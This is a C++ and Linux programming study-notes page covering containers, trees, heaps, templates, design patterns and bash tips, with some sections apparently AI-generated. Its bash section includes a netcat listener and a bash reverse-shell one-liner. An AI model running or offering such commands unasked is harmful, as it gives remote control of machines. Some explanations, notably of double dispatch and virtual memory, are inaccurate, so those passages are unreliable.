It’s important to know the common data structures and their characteristics.

  1. Arrays
  2. Linked Lists
  3. Stacks
  4. Queues
  5. Trees
  6. Graphs
  7. Hash Tables
  8. Sorting Algorithms (e.g. Bubble Sort, Quick Sort, Merge Sort)
  9. Searching Algorithms (e.g. Linear Search, Binary Search)
  10. Recursion
  11. Dynamic Programming
  12. Greedy Algorithms
  13. Depth-First Search (DFS)
  14. Breadth-First Search (BFS)
  15. Dijkstra’s Algorithm
  16. Prim’s Algorithm
  17. Kruskal’s Algorithm
  18. Bellman-Ford Algorithm
  19. Floyd-Warshall Algorithm
  20. Binary Search Trees
  21. AVL Trees
  22. Red-Black Trees
  23. Heap Data Structure
  24. Priority Queues
  25. Trie Data Structure
  26. Bloom Filters
  27. Disjoint Set Data Structure
  28. Hashing Techniques (e.g. Open Addressing, Chaining)
  29. Bit Manipulation
  30. Big O Notation and Time Complexity Analysis

std::vector

std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {

        // Constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; };
        fax(fax&&) { std::cout << x << " move ctor\n"; };

        // Assignment constructors
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        }
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;
        };

        const size_t id = x++;
    };

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
        y.push_back(fax{});
        std::cout << "-- capacity " << y.capacity() << " --\n";
    }

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});
}

See the program output (below), note how the capacity is growing exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then call the move constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all of the existing elements into the new storage (they would be moved instead if the move constructor were declared noexcept). Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead; also, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

Binary search trees have an amortized complexity of O(log n) unless the tree is unbalanced. Worst case, if the tree is unbalanced, then it is O(n). std::set and std::map are implemented using a red-black tree, a type of balanced binary search tree. C++23 introduces std::flat_map which is implemented using contiguous storage to make it more cache-friendly.
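
A minimal sketch of the ordering you get for free from the tree-based containers:

#include <iostream>
#include <map>
#include <set>
#include <string>

int main() {
    // Elements are kept sorted by the red-black tree
    const std::set<int> s{3, 1, 4, 1, 5};                 // duplicates dropped
    const std::map<std::string, int> m{{"b", 2}, {"a", 1}};

    for (const auto& x : s)
        std::cout << x << ' ';                            // 1 3 4 5

    for (const auto& [key, value] : m)
        std::cout << key << '=' << value << ' ';          // a=1 b=2
}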

A binary search tree is a data structure that is used to store and organize data in a hierarchical manner. It consists of nodes, each of which has a value and two child nodes - a left child node and a right child node. The root node is the topmost node in the tree.

The binary search tree follows a specific rule for storing the data - all values in the left subtree of a node must be less than the value of the node, and all values in the right subtree must be greater than the value of the node. This allows for efficient searching and sorting of data in the tree.

Binary search trees have several important properties, including:

  1. The left subtree of a node contains only values that are less than the value of the node.
  2. The right subtree of a node contains only values that are greater than the value of the node.
  3. The left and right subtrees of a node must also be binary search trees.
  4. There are no duplicate values in the tree.

Some common operations that can be performed on binary search trees include:

  1. Inserting a new node - the new node is inserted in the correct position according to the binary search tree rule.
  2. Searching for a specific value - the tree is traversed starting from the root node, comparing the value with each node until the value is found or the end of the tree is reached.
  3. Deleting a node - the node to be deleted is replaced with its successor or predecessor (based on specific rules), and the tree is rearranged to maintain the binary search tree properties.
  4. Traversing the tree - there are three common ways to traverse a binary search tree: in-order (left subtree, root, right subtree), pre-order (root, left subtree, right subtree), and post-order (left subtree, right subtree, root).

Binary search trees have an average time complexity of O(log n) for search, insert, and delete operations, making them efficient for storing and retrieving data. However, if the tree is not balanced (i.e. there is a significant difference in the number of nodes on the left and right subtrees), the time complexity can increase to O(n), making operations less efficient.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the leftmost node is the smallest, and the rightmost node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of occupied slots – known as the “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.
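
A minimal sketch of poking at the load factor:

#include <iostream>
#include <string>
#include <unordered_map>

int main() {
    std::unordered_map<std::string, int> ages{{"ada", 36}, {"alan", 41}};

    // Average lookup is O(1); a collision-heavy hash degrades towards O(n)
    std::cout << ages["ada"] << '\n';

    // Current fill ratio versus the threshold that triggers a rehash
    std::cout << ages.load_factor() << " / " << ages.max_load_factor() << '\n';

    // Pre-size the table to avoid rehashing while inserting many elements
    ages.reserve(1000);
}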

Heaps

A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required to keep a heap structure internally at all times. A min heap keeps its smallest element at the root, but the remaining elements are only partially ordered: a heap is not a sorted list. A usage sketch follows the diagrams below.

123456789abcdef
1
23
4567
89abcdef

Projected down, the top of the tree is the smallest element.

       1
   2       3
 4   5   6   7
8 9 a b c d e f
       1
      / \
     /   \
    /     \
   2       3
  / \     / \
 4   5   6   7
/ \ / \ / \ / \
8 9 a b c d e f
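
A minimal sketch of the standard heap facilities: std::priority_queue for the common case, or the std::make_heap family over your own vector.

#include <algorithm>
#include <iostream>
#include <queue>
#include <vector>

int main() {
    // Max-heap by default: top() is always the largest element
    std::priority_queue<int> pq;
    for (const int x : {3, 1, 4, 1, 5})
        pq.push(x);
    std::cout << pq.top() << '\n'; // 5

    // The same structure by hand, over a plain vector
    std::vector<int> v{3, 1, 4, 1, 5};
    std::make_heap(v.begin(), v.end());
    std::pop_heap(v.begin(), v.end()); // largest element moves to the back
    std::cout << v.back() << '\n';     // 5
}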

Comparison of heaps and binary search trees

A heap is a data structure that is based on a complete binary tree, where the parent node is either larger or smaller than its child nodes. It is commonly used to implement priority queues, where the highest priority element is always at the root. A heap does not necessarily have a specific ordering of its elements, as long as the parent-child relationship is maintained.

On the other hand, a binary search tree (BST) is a binary tree where the left child of a node is always smaller and the right child is always larger than the parent node. This ordering property makes it efficient for searching, inserting, and deleting elements. BSTs are commonly used to implement binary search algorithms.

In summary, the main differences between a heap and a binary search tree are:

  1. Ordering: A heap does not have a specific ordering of its elements, while a binary search tree follows a specific ordering.

  2. Structure: A heap is a complete binary tree, while a binary search tree can have different structures depending on the order of insertion.

  3. Usage: A heap is commonly used to implement priority queues, while a binary search tree is commonly used for searching, inserting, and deleting elements.

  4. Performance: A heap has faster insertion and deletion times compared to a binary search tree, but a binary search tree has faster search times.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means traversing the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

Container Average Case Time Complexity Worst Case Time Complexity Space Complexity
Vector O(1) O(n) O(n)
Deque O(1) O(n) O(n)
List O(1) O(n) O(n)
Forward List O(1) O(n) O(n)
Array O(1) O(1) O(n)
Set O(log n) O(n) O(n)
Unordered Set O(1) O(n) O(n)
Map O(log n) O(n) O(n)
Unordered Map O(1) O(n) O(n)
Stack O(1) O(n) O(n)
Queue O(1) O(n) O(n)
Priority Queue O(log n) O(n) O(n)

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything else.


Virtual memory

OpenAI:

  1. Increased Memory Capacity: Virtual memory allows computers to use more memory than physically available. This is because it uses a portion of the hard drive as virtual memory, which acts as an extension of the physical memory. This allows computers to run larger programs and processes that would otherwise be limited by the amount of physical memory available.

  2. Improved Performance: Virtual memory can improve overall system performance by allowing multiple programs to run at the same time without causing the system to crash or slow down. This is because virtual memory allows the computer to allocate memory resources efficiently and prioritize which programs get access to physical memory.

  3. Cost Savings: Virtual memory reduces the need for expensive physical memory upgrades. Instead of purchasing additional physical memory, virtual memory uses the existing hard drive space to act as virtual memory. This can save money for both consumers and businesses.

  4. Efficient Memory Management: Virtual memory allows the computer to manage memory more efficiently by using a technique called paging. This involves transferring data between physical memory and the hard drive, allowing the computer to free up physical memory for other processes when needed.

  5. Flexibility: Virtual memory allows for more flexibility in managing memory resources. It can allocate memory to different programs as needed, and adjust the amount of memory assigned to each program based on its usage. This ensures that the system runs smoothly and efficiently without any program causing it to crash due to lack of memory.

  6. Multi-Tasking: Virtual memory enables a computer to run multiple programs at the same time, even if each program requires more memory than is physically available. This allows for efficient multi-tasking, where users can switch between different programs seamlessly without any noticeable slowdowns.

  7. Fault Tolerance: Virtual memory can also improve system reliability and stability. If a program crashes or encounters an error, virtual memory can prevent the entire system from crashing by isolating the faulty program and allowing other programs to continue running.

  8. Compatibility: Virtual memory is compatible with most operating systems and hardware configurations. This makes it a versatile solution for managing memory resources on various types of computers, from personal laptops to large servers.

  9. Better User Experience: With virtual memory, users can run more complex and resource-intensive programs without experiencing slowdowns or crashes. This improves the overall user experience and allows for a smoother and more efficient workflow.

  10. Facilitates Advanced Features: Virtual memory is a prerequisite for many advanced features such as memory-mapped files, which allow data to be shared between processes, and hibernation, which saves the system state to the hard drive for fast startup. These features would not be possible without virtual memory.

Argument dependent lookup (aka Koenig lookup)

Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.

Notice begin and end parameters don’t specify a namespace, see ADL.

#include <algorithm>
#include <iostream>
#include <iterator>
#include <vector>

int main() {

    const std::vector v{1, 2, 3, 4, 5};
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "\n"));
}

Move semantics

This is a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.
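
A minimal sketch of the core idea: a move transfers ownership of the underlying buffer rather than copying it, leaving the source in a valid but unspecified state.

#include <iostream>
#include <string>
#include <utility>
#include <vector>

int main() {
    std::vector<std::string> words;

    std::string s(1000, 'x');
    words.push_back(std::move(s)); // steal s's buffer instead of copying it

    // s is valid but unspecified: assign to it before reading it again
    s = "reset";

    std::cout << words.front().size() << ' ' << s << '\n'; // 1000 reset
}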


bash

As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.

git

git is awesome on the command line and pretty much essential. Use it to manage your chores. See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)
shuf -n 1 readme.txt

From bash 5.

echo $EPOCHREALTIME
1614870873.574544

echo $EPOCHSECONDS
1614870876

uptime

The three load average values are 1, 5 and 15 minutes.

uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51

stress

Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -

Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template metaprogramming is a programming technique that uses templates in a programming language to perform computations at compile time. This technique leverages the power of templates to generate code based on types and values known at compile time.

In template metaprogramming, templates are used to define generic algorithms or data structures that can work with different data types. These templates are instantiated at compile time with specific data types, and the compiler generates specialized code for each instantiation. This allows for efficient code generation and optimization, as well as increased flexibility and reusability.

One of the key features of template metaprogramming is the ability to perform computations and make decisions at compile time. This is achieved through the use of template parameters, which can be types, constants, or other templates. These parameters can be used in conditional statements, loops, and other control structures, enabling the creation of complex compile-time computations.

Template metaprogramming is often used in C++ and other languages that support templates, such as D and Rust. It is commonly used for tasks such as type introspection, static polymorphism, and code generation. It is also used extensively in libraries and frameworks, as it allows for the creation of highly customizable and efficient code.

However, template metaprogramming can be complex and difficult to understand, and it requires a solid understanding of templates and the underlying language. It also has limitations, as not all computations can be performed at compile time, and the resulting code can be difficult to debug. Despite these challenges, template metaprogramming remains an important and powerful technique in modern programming.
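
A minimal sketch of a compile-time computation written as a template metaprogram, alongside the modern constexpr equivalent:

// Classic recursive template metaprogram: evaluated entirely by the compiler
template <unsigned N>
struct factorial {
    static constexpr unsigned value = N * factorial<N - 1>::value;
};

template <>
struct factorial<0> {
    static constexpr unsigned value = 1;
};

static_assert(factorial<5>::value == 120);

// The same computation as a constexpr function
constexpr unsigned factorial_fn(unsigned n) {
    return n == 0 ? 1 : n * factorial_fn(n - 1);
}

static_assert(factorial_fn(5) == 120);

int main() {}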

Templates in the C++ Standard Library allow for generic programming, where code can be written once and used with different data types without having to rewrite the code for each type. They are used extensively in the C++ Standard Library to provide a wide range of data structures and algorithms that can be used with various types of data.

Some common examples of templates in the C++ Standard Library include:

  1. Containers: The standard library provides a variety of container classes such as vectors, lists, and maps, which can hold different types of data. These containers are implemented using templates, allowing them to store any type of data.

  2. Algorithms: The standard library also includes a large number of algorithms such as sorting, searching, and manipulating data. These algorithms are also implemented using templates, allowing them to work with different data types.

  3. Iterators: Iterators are used to traverse data structures such as containers and provide a consistent way to access elements. The standard library provides a variety of iterator types, such as input, output, and bidirectional iterators, which are all implemented using templates.

  4. Function objects: Function objects are objects that behave like functions and are commonly used in algorithms to perform operations on elements. The standard library provides a variety of function objects, such as predicates and comparators, which are implemented using templates.

  5. Smart pointers: Smart pointers are used to manage memory and provide a safer alternative to raw pointers. The standard library provides smart pointers, such as unique_ptr and shared_ptr, which are implemented using templates to work with different types of data.

Templates allow for code reuse and make the standard library more flexible and efficient. They also make it easier for developers to create their own custom data structures and algorithms that can work with different data types. Overall, templates are an essential component of the C++ Standard Library and are used extensively to provide a powerful and versatile set of tools for developers.

SFINAE

SFINAE, or "Substitution Failure Is Not An Error," is a feature of C++ template metaprogramming that allows the compiler to discard template instantiations that would otherwise result in an error. This allows for more flexible and robust code, as well as better error messages.

SFINAE works by using the compiler’s ability to deduce template arguments and call functions with different argument types. When the compiler encounters a template with a particular set of arguments, it attempts to substitute those arguments into the template and compile it. If the substitution fails due to a compiler error, SFINAE kicks in and causes the compiler to discard that template and continue searching for another one that can be instantiated successfully.

The key to SFINAE is that the compiler treats failure of template substitution as a non-fatal error, rather than halting compilation. This allows for templates to be used in a more flexible manner, as the compiler can discard templates that would result in errors and continue searching for a valid one.

SFINAE is particularly useful in situations where different code paths need to be taken based on the properties of types used as template arguments. For example, it can be used to enable different functions for different types, or to specialize templates for certain types.

Overall, SFINAE is an important feature of C++ template metaprogramming that allows for more powerful and flexible code, while also improving error handling and debugging.
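
A minimal sketch using std::enable_if to select an overload by type category (C++20 concepts now express the same thing far more readably):

#include <iostream>
#include <type_traits>

// Participates in overload resolution only for integral types
template <typename T, std::enable_if_t<std::is_integral_v<T>, int> = 0>
void describe(T) {
    std::cout << "integral\n";
}

// ... and this one only for floating-point types
template <typename T, std::enable_if_t<std::is_floating_point_v<T>, int> = 0>
void describe(T) {
    std::cout << "floating point\n";
}

int main() {
    describe(42);   // integral
    describe(3.14); // floating point
}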


Design patterns

The objective of design patterns is to provide reusable and proven solutions to common software design problems. They help developers to create flexible, maintainable, and scalable software by providing a set of standard, well-documented and tested solutions. These patterns encapsulate the knowledge and experience of expert developers, making it easier for others to understand and apply them in their own projects. By using design patterns, developers can avoid reinventing the wheel and save time and effort in developing high-quality software. They also promote consistency and standardization in software development, making it easier for teams to collaborate and communicate effectively. Ultimately, the goal of design patterns is to improve the overall quality and efficiency of software development.

Categories

Common patterns

  1. Singleton Pattern: Ensures that only one instance of a class exists and provides a global point of access to it.

  2. Factory Pattern: Provides a way to create objects without specifying the exact class of object that will be created.

  3. Observer Pattern: Defines a one-to-many dependency between objects so that when one object changes state, all its dependents are notified and updated automatically.

  4. Decorator Pattern: Allows behavior to be added to an individual object, dynamically, without affecting the behavior of other objects from the same class.

  5. Adapter Pattern: Allows the interface of an existing class to be used as another interface. It is often used to make existing classes work with others without modifying their source code.

  6. Strategy Pattern: Defines a family of algorithms, encapsulates each one, and makes them interchangeable. It allows the algorithm to be selected at runtime.

  7. Iterator Pattern: Provides a way to access the elements of an aggregate object sequentially without exposing its underlying representation.

  8. Template Method Pattern: Defines the skeleton of an algorithm in a method, deferring some steps to subclasses. It allows subclasses to redefine certain steps of an algorithm without changing the algorithm’s structure.

  9. State Pattern: Allows an object to change its behavior when its internal state changes. It encapsulates the behavior associated with a particular state in an object.

  10. Prototype Pattern: Creates new objects by cloning existing ones, instead of creating new objects from scratch. It is useful when creating objects is time-consuming or expensive.

  11. Composite Pattern: Allows objects to be composed into tree structures to represent part-whole hierarchies. It allows clients to treat individual objects and compositions of objects uniformly.

  12. Bridge Pattern: Decouples an abstraction from its implementation so that the two can vary independently. It is useful when there are multiple implementations of an abstraction.

  13. Facade Pattern: Provides a unified interface to a set of interfaces in a subsystem. It simplifies and decouples the client from the complex subsystem.

  14. Command Pattern: Encapsulates a request as an object, allowing it to be treated as a first-class object. It allows requests to be queued, logged, and undone.

  15. Proxy Pattern: Provides a surrogate or placeholder for another object to control access to it. It is useful when creating expensive objects or when accessing remote objects.

Factory pattern

The factory design pattern is a design pattern that falls under the creational category of design patterns. It is used to create objects without specifying the exact class of object that will be created. This pattern provides a way to create objects based on a common interface, allowing for flexibility and scalability in code.

The main idea behind the factory design pattern is to define an interface for creating objects, but let subclasses decide which class to instantiate. This allows for the creation of objects without having to specify the exact class, making the code more adaptable to change.

The basic structure of the factory design pattern consists of a factory class, which is responsible for creating objects, and a set of concrete classes that implement the common interface. The client code interacts with the factory class to create the desired objects, rather than directly creating them.

There are different types of factory design patterns, including simple factory, factory method, and abstract factory. The simple factory pattern uses a single factory class to create all types of objects, while the factory method pattern uses a separate factory method for each type of object. The abstract factory pattern uses a set of related factory classes to create families of objects.

One of the main advantages of using the factory design pattern is that it promotes loose coupling between objects, as the client code is not directly dependent on the concrete classes. This makes it easier to add new types of objects without having to modify the client code.

Another advantage is that it centralizes object creation, making it easier to manage and maintain. This can be especially useful in large codebases where there may be multiple instances of object creation.

In summary, the factory design pattern is a useful tool for creating objects in a flexible and scalable manner. It promotes loose coupling and centralizes object creation, making it a valuable pattern in software design.

Example of factory pattern

Store a system configuration in an external text file and construct at runtime using the factory pattern.
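
A minimal sketch along those lines, with hypothetical widget types keyed by a string that could equally have been read from a configuration file:

#include <memory>
#include <stdexcept>
#include <string>

// Common interface returned by the factory
struct widget {
    virtual ~widget() = default;
    virtual std::string name() const = 0;
};

struct button : widget {
    std::string name() const override { return "button"; }
};

struct slider : widget {
    std::string name() const override { return "slider"; }
};

// The factory: callers depend only on the interface, not the concrete types
std::unique_ptr<widget> make_widget(const std::string& kind) {
    if (kind == "button") return std::make_unique<button>();
    if (kind == "slider") return std::make_unique<slider>();
    throw std::invalid_argument{"unknown widget: " + kind};
}

int main() {
    // "slider" stands in for a value parsed from the external config
    const auto w = make_widget("slider");
}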

Visitor pattern

The visitor design pattern is a behavioral design pattern that allows for the separation of an algorithm from an object structure on which it operates. It allows for the addition of new operations to an object structure without modifying the objects themselves.

In this pattern, there are three main components: the visitor interface, the concrete visitor, and the element interface. The visitor interface defines the visit methods for each element in the object structure. The concrete visitor implements these visit methods and performs the desired operations on the elements. The element interface defines an accept method that allows the visitor to visit the element and perform its operations.

The visitor design pattern works by having the object structure accept a visitor, which then traverses through the structure and performs the specific operations on each element. This allows for the addition of new operations by simply creating a new concrete visitor and adding it to the object structure.

One of the key benefits of the visitor design pattern is that it allows for the addition of new operations without modifying the existing code. It also helps to keep the code clean and organized by separating the algorithm from the elements.

However, one potential downside of this pattern is that it can make the code more complex and difficult to understand, especially for beginners. It also requires a good understanding of the object structure and the operations that need to be performed on it.

Overall, the visitor design pattern is useful in situations where there are multiple operations that need to be performed on a complex object structure, and when the structure needs to be easily extensible without modifying existing code.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch is a design pattern that allows for subtype polymorphism in object-oriented programming. It allows a method to be dynamically dispatched based on the runtime type of two objects, rather than just one. This means that the same method can behave differently depending on the types of both the caller and the callee objects.

In traditional single dispatch, the method is dispatched based on the runtime type of the caller object only. This means that the same method will always behave in the same way, regardless of the type of the callee object. However, in double dispatch, the method is dispatched based on both the runtime types of the caller and callee objects, allowing for more specific and dynamic behavior.

This is achieved through the use of virtual methods, which are methods that can be overridden by subclasses. When a virtual method is called on an object, the runtime type of that object is used to determine which implementation of the method to use. With double dispatch, this determination is extended to also consider the runtime type of the method’s parameters.

For example, let’s say we have a Shape interface and two subclasses, Circle and Rectangle. Both subclasses have a draw() method that takes in a Color object as a parameter. In single dispatch, the draw() method of the Circle class would always be called when draw() is invoked on a Circle object. However, with double dispatch, the draw() method of the Circle class will be called if the callee object is a Circle and the parameter is a Color, but the draw() method of the Rectangle class will be called if the callee object is a Rectangle and the parameter is a Color.

Overall, double dispatch allows for more flexibility and dynamic behavior in polymorphism by considering the types of both the caller and callee objects.

Example of visitor pattern

Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.
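
A minimal sketch with a hypothetical circle/rectangle hierarchy; the accept/visit pair is where the double dispatch described above happens.

#include <iostream>

struct circle;
struct rectangle;

// One visit overload per concrete shape
struct shape_visitor {
    virtual ~shape_visitor() = default;
    virtual void visit(const circle&) = 0;
    virtual void visit(const rectangle&) = 0;
};

struct shape {
    virtual ~shape() = default;
    virtual void accept(shape_visitor&) const = 0; // first dispatch: on the shape
};

struct circle : shape {
    void accept(shape_visitor& v) const override { v.visit(*this); } // second dispatch: on the visitor
};

struct rectangle : shape {
    void accept(shape_visitor& v) const override { v.visit(*this); }
};

// A new operation is just a new visitor: the shape classes don't change
struct area_printer : shape_visitor {
    void visit(const circle&) override { std::cout << "circle area\n"; }
    void visit(const rectangle&) override { std::cout << "rectangle area\n"; }
};

int main() {
    area_printer printer;
    circle c;
    rectangle r;
    c.accept(printer);
    r.accept(printer);
}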

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.

Reflection

“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a principle in software design that states that high-level modules should not depend on low-level modules, but both should depend on abstractions. This means that the dependencies between components should be inverted, with the higher-level components depending on interfaces or abstract classes that define behavior, rather than directly depending on lower-level components that implement that behavior. This allows for greater flexibility, as components can be easily substituted or changed without affecting the overall structure or functionality of the system. It also promotes modular and decoupled code, making it easier to maintain, test, and extend. Dependency inversion is a key principle in the SOLID design principles for object-oriented programming.
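
A minimal sketch: the high-level report class depends only on an abstract logger, and a concrete implementation is injected from outside.

#include <iostream>
#include <memory>
#include <string>

// The abstraction both layers depend on
struct logger {
    virtual ~logger() = default;
    virtual void log(const std::string&) = 0;
};

// Low-level detail, swappable without touching the high-level code
struct console_logger : logger {
    void log(const std::string& msg) override { std::cout << msg << '\n'; }
};

// High-level module: knows only about the interface
class report {
    std::shared_ptr<logger> log_;

public:
    explicit report(std::shared_ptr<logger> log) : log_{std::move(log)} {}
    void generate() { log_->log("report generated"); }
};

int main() {
    report r{std::make_shared<console_logger>()};
    r.generate();
}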


OpenAI generated interview questions

  1. What are the different types of data structures and when would you use each one?

  2. Explain the difference between a stack and a queue.

  3. How do you ensure that your code is efficient and scalable?

  4. Can you describe the process of object-oriented programming and provide an example?

  5. How do you approach debugging and troubleshooting when encountering errors in your code?

  6. What is the difference between a pointer and a reference in C++?

  7. What is the difference between pass by value and pass by reference?

  8. What is the difference between a class and an object in C++?

  9. How does dynamic memory allocation work in C++?

  10. What is the difference between virtual and pure virtual functions in C++?